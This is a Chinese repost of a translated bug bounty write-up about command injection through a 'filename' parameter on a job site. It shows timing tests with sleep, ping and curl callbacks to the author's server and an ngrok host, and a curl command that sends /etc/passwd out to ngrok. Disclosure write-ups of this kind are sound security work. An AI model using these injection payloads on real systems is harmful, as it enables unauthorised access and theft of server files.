bug bounty经历分享 命令注入

2019-04-04 约 57 字 预计阅读 1 分钟

声明:本文 【bug bounty经历分享 命令注入】 由作者 惊鸿一瞥最是珍贵 于 2019-02-17 09:27:00 首发 先知社区 曾经 浏览数 1219 次

感谢 惊鸿一瞥最是珍贵 的辛苦付出!

摘要

让我们将时间倒退到2017年12月,我在一个职位列表网站上发现了一个命令注入漏洞。以下是简单的POC,其中易受攻击的参数是filename。

PoC

我先用sleep 5进行测试,响应延迟为5-6秒(6.113毫秒)。你可以看到右下角的延迟。

我随即用sleep 10进行测试,看看有什么不同。响应延迟10-11秒(11.137毫秒)。延迟时间同样位于右下角。

我尝试使用命令ping -c 5 <my server IP address>ping一下我的服务器,并运行tcpdump -i <interface> -n icmp查看传入的ICMP数据包。ping命令意味着向我的服务器IP地址已经发送了5次ICMP数据包。


很抱歉我修改了相关细节,但您可以看到有5次传入的ICMP数据包。我的服务器IP地址是5.000.000.105,传入的ICMP数据包来自000.000.39.169。现在我知道filename参数易受命令注入攻击。
我用ngrok做了另一个测试。所以我在localhost上运行 ./ngrok http 80,对于易受攻击的参数执行curl blablabla.ngrok.io


现在让我们看一下ngrok Web界面上的响应(http://127.0.0.1:4040)。我收到了来自IP地址000.000.39.169的请求。和之前的ICMP数据包的IP地址一样!


现在我可以读取易受攻击的服务器上的文件,并使用命令curl -F shl=@/etc/passwd blablabla.ngrok.io将其发送到我的ngrok地址。该命令意味着使用包含/etc/passwdshl参数向blablabla.ngrok.io发送POST请求。

结果是IP地址为000.000.39.169的服务器将/ etc / passwd发送到我的ngrok上。


以上。Happy hacking!

翻译文章:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d

关键词:[‘技术文章’, ‘翻译文章’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now